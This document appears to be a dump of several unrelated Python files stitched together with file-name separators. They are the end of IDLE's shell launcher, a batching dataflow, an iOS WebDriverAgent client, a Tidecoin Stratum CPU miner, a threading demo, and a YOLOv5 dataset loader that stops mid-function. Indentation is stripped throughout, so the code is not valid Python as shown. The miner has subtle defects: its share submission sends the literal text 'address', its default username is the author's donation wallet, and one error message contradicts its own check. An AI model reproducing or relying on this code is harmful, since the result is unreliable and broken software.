# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic issues and print warning message(s) in
# the IDLE shell window; this is less intrusive than always
# opening a separate window.
# Warn if using a problematic OS X Tk version.
tkversionwarning = macosx.tkVersionWarning(root)
if tkversionwarning:
shell.show_warning(tkversionwarning)
# Warn if the "Prefer tabs when opening documents" system
# preference is set to "Always".
prefer_tabs_preference_warning = macosx.preferTabsPreferenceWarning()
if prefer_tabs_preference_warning:
shell.show_warning(prefer_tabs_preference_warning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
batch.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : batch.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 01/22/2018
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
from copy import deepcopy
from threading import Thread, Event
import traceback
from jacinle.concurrency.event import MTBooleanEvent
from jacinle.logging import get_logger
from jacinle.utils.meta import gofor
from .dataflow import SimpleDataFlowBase
logger = get_logger(__file__)
__all__ = ['BatchDataFlow', 'EpochDataFlow']
def batch_default_filler(buffer, idx, val):
for k, v in gofor(val):
if k in buffer:
buffer[k][idx] = v
class BatchDataFlow(SimpleDataFlowBase):
_buffer = None
_cond = None
_filler_thread = None
_stop_event = None
def __init__(self, source, batch_size, sample_dict, filler=batch_default_filler):
super().__init__()
self._source = source
self._batch_size = batch_size
self._sample_dict = sample_dict
self._filler = filler
def _initialize(self):
self._initialize_buffer()
self._initialize_filler()
def _initialize_buffer(self):
self._buffer = [deepcopy(self._sample_dict) for _ in range(2)]
def _initialize_filler(self):
self._cond = [MTBooleanEvent() for _ in range(2)]
self._stop_event = Event()
self._filler_thread = Thread(target=self._filler_mainloop, name=str(self) + ':filler', daemon=True)
self._filler_thread.start()
def _filler_mainloop(self):
current = 0
it = iter(self._source)
try:
while True:
self._cond[current].wait_false()
for i in range(self._batch_size):
self._filler(self._buffer[current], i, next(it))
self._cond[current].set_true()
current = 1 - current
except Exception as e:
logger.warn('{} got exception {} in filler thread: {}.'.format(type(self), type(e), e))
traceback.print_exc()
self._cond[current].set_true()
self._stop_event.set()
def _gen(self):
current = 0
while True:
self._cond[current].wait_true()
if self._stop_event.is_set():
return
yield self._buffer[current]
self._cond[current].set_false()
current = 1 - current
def _len(self):
length = len(self._source)
return None if length is None else length // self._batch_size
class EpochDataFlow(SimpleDataFlowBase):
def __init__(self, source, epoch_size):
self._source = source
self._source_iter = None
self._epoch_size = epoch_size
def _initialize(self):
self._source_iter = iter(self._source)
def _gen(self):
for i in range(self._epoch_size):
try:
yield next(self._source_iter)
except StopIteration:
return
def _len(self):
return self._epoch_size
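# A minimal usage sketch for BatchDataFlow (illustrative only; assumes numpy is available and
# that SimpleDataFlowBase exposes the usual iteration protocol):
#
#   import numpy as np
#   source = ({'x': np.random.rand(3), 'y': 1} for _ in range(1000))          # hypothetical source
#   sample_dict = {'x': np.zeros((32, 3)), 'y': np.zeros(32, dtype='int64')}  # pre-allocated buffers
#   df = BatchDataFlow(source, batch_size=32, sample_dict=sample_dict)
#   for batch in df:     # yields one of the two double-buffered dicts, filled by the filler thread
#       consume(batch)   # hypothetical consumer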
|
_wdapy.py
|
# coding: utf-8
import atexit
import base64
import io
import json
import logging
import queue
import subprocess
import sys
import threading
import time
import typing
import requests
from cached_property import cached_property
from logzero import setup_logger
from PIL import Image
from ._alert import Alert
from ._base import BaseClient
from ._logger import logger
from ._proto import *
from ._types import *
from .exceptions import *
from .usbmux import requests_usbmux, usbmux
class HTTPResponse:
def __init__(self, resp: requests.Response, err: requests.RequestException):
self._resp = resp
self._err = err
def is_success(self) -> bool:
return self._err is None and self._resp.status_code == 200
def json(self) -> dict:
assert self._resp is not None
try:
return self._resp.json()
except json.JSONDecodeError:
return RequestError("JSON decode error", self._resp.text)
def get_error_message(self) -> str:
if self._resp:
return self._resp.text
return str(self._err)
def raise_if_failed(self):
if self._err:
raise RequestError("HTTP request error", self._err)
if self._resp.status_code != 200:
raise RequestError(self._resp.status_code, self._resp.text)
class CommonClient(BaseClient):
def __init__(self, wda_url: str):
super().__init__(wda_url)
self.__ui_size = None
self.__debug = False
@property
def debug(self) -> bool:
return self.__debug
@debug.setter
def debug(self, v: bool):
if v:
setup_logger(NAME)
else:
setup_logger(NAME, level=logging.INFO)
def app_start(self, bundle_id: str):
self.session_request(POST, "/wda/apps/launch", {
"bundleId": bundle_id
})
def app_terminate(self, bundle_id: str):
self.session_request(POST, "/wda/apps/terminate", {
"bundleId": bundle_id
})
def app_state(self, bundle_id: str) -> AppState:
value = self.session_request(POST, "/wda/apps/state", {
"bundleId": bundle_id
})["value"]
return AppState(value)
def app_current(self) -> AppInfo:
self.unlock()
st = self.status()
if st.session_id is None:
self.session()
data = self.request(GET, "/wda/activeAppInfo")
value = data['value']
return AppInfo.value_of(value)
def app_list(self) -> AppList:
value = self.session_request(GET, "/wda/apps/list")["value"][0]
return AppList.value_of(value)
def deactivate(self, duration: float):
self.session_request(POST, "/wda/deactivateApp", {
"duration": duration
})
@cached_property
def alert(self) -> Alert:
return Alert(self)
def sourcetree(self) -> SourceTree:
data = self.request(GET, "/source")
return SourceTree.value_of(data)
def open_url(self, url: str):
self.session_request(POST, "/url", {
"url": url
})
def set_clipboard(self, content: str, content_type="plaintext"):
""" only works when WDA app is foreground """
self.session_request(POST, "/wda/setPasteboard",{
"content": base64.b64encode(content.encode()).decode(),
"contentType": content_type
})
def get_clipboard(self, content_type="plaintext") -> str:
data = self.session_request(POST, "/wda/getPasteboard",{
"contentType": content_type
})
return base64.b64decode(data['value']).decode('utf-8')
def appium_settings(self, kwargs: dict = None) -> dict:
if kwargs is None:
return self.session_request(GET, "/appium/settings")["value"]
payload = {"settings": kwargs}
return self.session_request(POST, "/appium/settings", payload)["value"]
def is_locked(self) -> bool:
return self.request(GET, "/wda/locked")["value"]
def unlock(self):
self.request(POST, "/wda/unlock")
def lock(self):
self.request(POST, "/wda/lock")
def homescreen(self):
self.request(POST, "/wda/homescreen")
def shutdown(self):
self.request(GET, "/wda/shutdown")
def get_orientation(self) -> Orientation:
value = self.session_request(GET, '/orientation')['value']
return Orientation(value)
def window_size(self) -> typing.Tuple[int, int]:
"""
Returns:
UISize
Ref:
FBElementCommands.m
"""
data = self.session_request(GET, "/window/size")
return data['value']['width'], data['value']['height']
        # Code kept for now: the commented-out method below obtains the screen size from a screenshot.
        # # A small speed optimization: derive the screen size from the screenshot dimensions.
# orientation = self.get_orientation()
# if self.__ui_size is None:
        # # Assume the orientation of the screenshot returned here is correct.
# pixel_width, pixel_height = self.screenshot().size
# w, h = pixel_width//self.scale, pixel_height//self.scale
# if self.get_orientation() == Orientation.PORTRAIT:
# self.__ui_size = (w, h)
# else:
# self.__ui_size = (h, w)
# if orientation == Orientation.LANDSCAPE:
# return self.__ui_size[::-1]
# else:
# return self.__ui_size
def send_keys(self, value: str):
""" input with some text """
self.session_request(POST, "/wda/keys", {"value": list(value)})
def tap(self, x: int, y: int):
self.session_request(POST, "/wda/tap/0", {"x": x, "y": y})
def touch_and_hold(self, x: int, y: int, duration: float):
""" touch and hold
Ref:
FBElementCommands.m
"""
self.session_request(POST, "/wda/touchAndHold", {"x": x, "y": y, "duration": duration})
def swipe(self,
from_x: int,
from_y: int,
to_x: int,
to_y: int,
duration: float = 0.5):
payload = {
"fromX": from_x,
"fromY": from_y,
"toX": to_x,
"toY": to_y,
"duration": duration}
self.session_request(POST, "/wda/dragfromtoforduration", payload)
def press(self, name: Keycode):
payload = {
"name": name
}
self.session_request(POST, "/wda/pressButton", payload)
def press_duration(self, name: Keycode, duration: float):
hid_usages = {
"home": 0x40,
"volumeup": 0xE9,
"volumedown": 0xEA,
"power": 0x30,
"snapshot": 0x65,
"power_plus_home": 0x65
}
name = name.lower()
if name not in hid_usages:
raise ValueError("Invalid name:", name)
        usage = hid_usages[name]
        payload = {
            "page": 0x0C,
            "usage": usage,
            "duration": duration
        }
return self.session_request(POST, "/wda/performIoHidEvent", payload)
@cached_property
def scale(self) -> int:
# Response example
# {"statusBarSize": {'width': 320, 'height': 20}, 'scale': 2}
value = self.session_request(GET, "/wda/screen")['value']
return value['scale']
def status_barsize(self) -> StatusBarSize:
# Response example
# {"statusBarSize": {'width': 320, 'height': 20}, 'scale': 2}
value = self.session_request(GET, "/wda/screen")['value']
return StatusBarSize.value_of(value['statusBarSize'])
def screenshot(self) -> Image.Image:
""" take screenshot """
value = self.request(GET, "/screenshot")["value"]
raw_value = base64.b64decode(value)
buf = io.BytesIO(raw_value)
im = Image.open(buf)
return im.convert("RGB")
def battery_info(self) -> BatteryInfo:
data = self.session_request(GET, "/wda/batteryInfo")["value"]
return BatteryInfo.value_of(data)
@property
def info(self) -> DeviceInfo:
return self.device_info()
def device_info(self) -> DeviceInfo:
data = self.session_request(GET, "/wda/device/info")["value"]
return DeviceInfo.value_of(data)
class XCUITestRecover(Recover):
def __init__(self, udid: str):
self._udid = udid
def recover(self) -> bool:
""" launch by tidevice
https://github.com/alibaba/tidevice
"""
logger.info("WDA is starting using tidevice ...")
args = [sys.executable, '-m', 'tidevice', '-u', self._udid, 'xctest']
p = subprocess.Popen(args,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
start_new_session=True,
close_fds=True, encoding="utf-8")
que = queue.Queue()
threading.Thread(target=self.drain_process_output, args=(p, que), daemon=True).start()
try:
success = que.get(timeout=10)
return success
except queue.Empty:
logger.warning("WDA launch timeout 10s")
p.kill()
return False
def drain_process_output(self, p: subprocess.Popen, msg_queue: queue.Queue):
deadline = time.time() + 10
lines = []
while time.time() < deadline:
if p.poll() is not None:
logger.warning("xctest exited, output --.\n %s", "\n".join(lines)) # p.stdout.read())
msg_queue.put(False)
return
line = p.stdout.readline().strip()
lines.append(line)
# logger.info("%s", line)
if "WebDriverAgent start successfully" in line:
logger.info("WDA started")
msg_queue.put(True)
break
atexit.register(p.kill)
while p.stdout.read() != "":
pass
class AppiumClient(CommonClient):
"""
client for https://github.com/appium/WebDriverAgent
"""
def __init__(self, wda_url: str = DEFAULT_WDA_URL):
super().__init__(wda_url)
class AppiumUSBClient(AppiumClient):
def __init__(self, udid: str = None, port: int = 8100):
if udid is None:
_usbmux = usbmux.Usbmux()
udid = _usbmux.get_single_device_udid()
super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f":{port}")
self.set_recover_handler(XCUITestRecover(udid))
class NanoClient(AppiumClient):
"""
Repo: https://github.com/nanoscopic/WebDriverAgent
    This repo has changed a lot recently and the newer code drops the HTTP API in favor of NNG,
    so the old commit version below is used here:
https://github.com/nanoscopic/WebDriverAgent/tree/d07372d73a4cc4dc0b0d7807271e6d7958e57302
"""
def tap(self, x: int, y: int):
""" fast tap """
self.request(POST, "/wda/tap", {
"x": x,
"y": y,
})
def swipe(self,
from_x: int,
from_y: int,
to_x: int,
to_y: int,
duration: float = .5):
""" fast swipe """
self.request(POST, "/wda/swipe", {
"x1": from_x,
"y1": from_y,
"x2": to_x,
"y2": to_y,
"delay": duration})
class NanoUSBClient(NanoClient):
def __init__(self, udid: str = None, port: int = 8100):
if udid is None:
_usbmux = usbmux.Usbmux()
udid = _usbmux.get_single_device_udid()
super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f":{port}")
self.set_recover_handler(XCUITestRecover(udid))
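# A minimal usage sketch (not part of the original file; assumes WebDriverAgent
# is already running on the only USB-attached device): read the window size and
# tap the centre of the screen.
if __name__ == "__main__":
    _client = AppiumUSBClient()
    _w, _h = _client.window_size()
    _client.tap(_w // 2, _h // 2)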
|
miner_patch.py
|
# A Stratum-compatible mini miner
# based on the documentation at
# https://slushpool.com/help/#!/manual/stratum-protocol
#2017-2019 Martin Nadal https://martinnadal.eu
import socket
import json
import random
import traceback
import multiprocessing
import tdc_mine
import time
from multiprocessing import Process, Queue, cpu_count
bfh = bytes.fromhex
def hash_decode(x: str) -> bytes:
return bfh(x)[::-1]
def target_to_bits(target: int) -> int:
c = ("%066x" % target)[2:]
while c[:2] == '00' and len(c) > 6:
c = c[2:]
bitsN, bitsBase = len(c) // 2, int.from_bytes(bfh(c[:6]), byteorder='big')
if bitsBase >= 0x800000:
bitsN += 1
bitsBase >>= 8
return bitsN << 24 | bitsBase
def bits_to_target(bits: int) -> int:
bitsN = (bits >> 24) & 0xff
if not (0x03 <= bitsN <= 0x20):
raise Exception("First part of bits should be in [0x03, 0x1d]")
bitsBase = bits & 0xffffff
if not (0x8000 <= bitsBase <= 0x7fffff):
raise Exception("Second part of bits should be in [0x8000, 0x7fffff]")
return bitsBase << (8 * (bitsN - 3))
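# Illustrative check (not part of the original file): the compact "bits"
# encoding round-trips for the classic difficulty-1 target 0xffff * 2**208.
assert bits_to_target(0x1d00ffff) == 0xffff << 208
assert target_to_bits(0xffff << 208) == 0x1d00ffff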
def bh2u(x: bytes) -> str:
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
    '01020a'
"""
return x.hex()
def miner_thread(xblockheader, difficult):
nonce = random.randint(0, 2 ** 32 - 1) # job.get('nonce')
nonce_and_hash = tdc_mine.miner_thread(xblockheader, difficult, nonce)
return nonce_and_hash
def worker(xblockheader, payload1, payload2, bdiff, sock, number):
try:
while 1:
z = miner_thread(xblockheader, bdiff)
sock.sendall(payload1 + z[:8] + payload2)
except BrokenPipeError:
print("Pipe broken")
def miner(address, host, port, cpu_count=cpu_count(), password='password'):
print("PyTideMiner is a Stratum CPU mining client. \n"
"If you like this piece of software, please "
"consider supporting its future development via "
"donating to this address TSrAZcfyx8EZdzaLjV5ketPwtowgw3WUYw\n\n"
"Parameters:"
"-o mining server url (eg: pool.tidecoin.exchange:3032)\n"
"-u username(mining address) for mining server\n"
"-t count miner threads\n"
"-p password for mining server\n"
"Support chat: https://t.me/pool_tidecoin_exchange\n")
print("address:{}".format(address))
print("host:{} port:{}".format(host, port))
print("Count threads: {}".format(cpu_count))
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
print("Socket connected")
sock.sendall(b'{"id": 1, "method": "mining.subscribe", "params": ["pytideminer-1.0.0"]}\n')
lines = sock.recv(1024).decode().split('\n')
response = json.loads(lines[0])
sub_details, extranonce1, extranonce2_size = response['result']
extranonce2 = '00' * extranonce2_size
sock.sendall(b'{"params": ["' + address.encode() + b'", "' + password.encode() + b'"], "id": 2, "method": "mining.authorize"}\n')
print("Mining authorize")
procs = []
count = cpu_count
print("Start mining")
new_time = time.time()
count_shares = 0
global_count_share = 0
global_count_success_share = 0
        difficult = 0.5
        old_diff = difficult
        bdiff = bytes(str(difficult), "UTF-8")  # initialise before the first notify in case set_difficulty has not arrived yet
timer_without_new_job = time.time()
while True:
response = sock.recv(2024).decode()
responses = [json.loads(res) for res in response.split('\n') if len(res.strip()) > 0]
for response in responses:
if response['id'] == 4 and not response['error']:
count_shares += 1
global_count_share += 1
global_count_success_share += 1
print(f"accepted: {global_count_success_share}/{global_count_share} ({round(global_count_success_share/global_count_share*100)}%) (yay!!!)")
elif response['id'] == 4 and response['error']:
global_count_share += 1
print("boooo", response['error'])
elif response['id'] == 2 and not response['error']:
print("Authorize successful!!!")
elif response['id'] == 2 and response['error']:
print("Authorize error!!!", response['error'])
# get rid of empty lines
elif response['method'] == 'mining.set_difficulty':
old_diff = difficult
difficult = response['params'][0]
bdiff = bytes(str(difficult), "UTF-8")
print("New stratum difficulty: ", difficult)
elif response['method'] == 'mining.notify':
job_id, prevhash, coinb1, coinb2, merkle_branch, \
version, nbits, ntime, clean_jobs = response['params']
d = ''
for h in merkle_branch:
d += h
merkleroot_1 = tdc_mine.sha256d_str(coinb1.encode('utf8'), extranonce1.encode('utf8'),
extranonce2.encode('utf8'), coinb2.encode('utf8'), d.encode('utf8'))
xblockheader0 = version + prevhash + merkleroot_1.decode('utf8') + ntime + nbits
print("Mining notify")
for proc in procs:
proc.terminate()
procs = []
timer_without_new_job = time.time()
old_time = new_time
new_time = time.time()
xnonce = "00000000"
xblockheader = (xblockheader0 + xnonce).encode('utf8')
payload1 = bytes(
'{"params": ["' + "address" + '", "' + job_id + '", "' + extranonce2 + '", "' + ntime + '", "',
"UTF-8")
payload2 = bytes('"], "id": 4, "method": "mining.submit"}\n', "UTF-8")
for number in range(count):
proc = Process(target=worker, args=(xblockheader, payload1, payload2, bdiff, sock, number + 1))
proc.daemon = True
procs.append(proc)
proc.start()
if count_shares:
hashrate = count_shares * (old_diff / 65536) * 2 ** 32 / (new_time-old_time)
print(f"Found {count_shares} shares in {round(new_time-old_time)} seconds at diff", old_diff)
print(f"Current Hashrate:", round(hashrate), "H/s")
print(f"Recommended diff:", round((count_shares*10/(new_time-old_time))*old_diff, 2))
old_diff = difficult
count_shares = 0
if time.time() - timer_without_new_job > 120:
                    raise Exception("no new job received for 120 seconds, reconnecting")
except:
print(traceback.format_exc())
sock.close()
for proc in procs:
proc.terminate()
return
if __name__ == "__main__":
multiprocessing.freeze_support()
import argparse
import sys
# Parse the command line
parser = argparse.ArgumentParser(description="PyMiner is a Stratum CPU mining client. "
"If you like this piece of software, please "
"consider supporting its future development via "
"donating to one of the addresses indicated in the "
"README.md file")
parser.add_argument('-o', '--url', default="pool.tidecoin.exchange:3032", help='mining server url (eg: pool.tidecoin.exchange:3032)')
parser.add_argument('-u', '--user', dest='username', default='TSrAZcfyx8EZdzaLjV5ketPwtowgw3WUYw.default', help='username for mining server',
metavar="USERNAME")
    parser.add_argument('-t', '--threads', dest='threads', default=cpu_count(), help='count of miner threads',
                        metavar="THREADS")
    parser.add_argument('-p', '--password', dest='password', default='password', help='password for mining server',
                        metavar="PASSWORD")
options = parser.parse_args(sys.argv[1:])
while True:
try:
miner(options.username, options.url.split(":")[0], int(options.url.split(":")[1]), int(options.threads), options.password)
except KeyboardInterrupt:
break
except:
print(traceback.format_exc())
break
|
Multi-Threading.py
|
from threading import Thread
import threading
from time import sleep
def Numbers():
print(threading.current_thread().getName(),"Has started")
for x in range(10):
print(x)
print(threading.current_thread().getName(),"Has stopped")
print("\nYou can see that both the functions ran parallely")
t1 = Thread(target=Numbers)
t2 = Thread(target=Numbers)
t1.start()
t2.start()
sleep(1)
input("Enter any Key to exit ")
|
datasets.py
|
# flake8: noqa
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8):
    # Make sure only the first process in DDP processes the dataset first, so the following ones can use the cache.
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
dataloader = InfiniteDataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn) # torch.utils.data.DataLoader()
return dataloader, dataset
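# A hypothetical usage sketch (not part of the original file): `opt` only needs
# a `single_cls` attribute here, and the dataset path is illustrative - it must
# point at a folder (or list file) of images with matching label files.
def _create_dataloader_example():
    from types import SimpleNamespace
    opt = SimpleNamespace(single_cls=False)
    return create_dataloader('data/train', 640, 16, 32, opt)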
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers.
Uses same syntax as vanilla DataLoader.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever.
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
self.label_files = [x.replace(sa, sb, 1).replace(os.path.splitext(x)[-1], '.txt') for x in self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
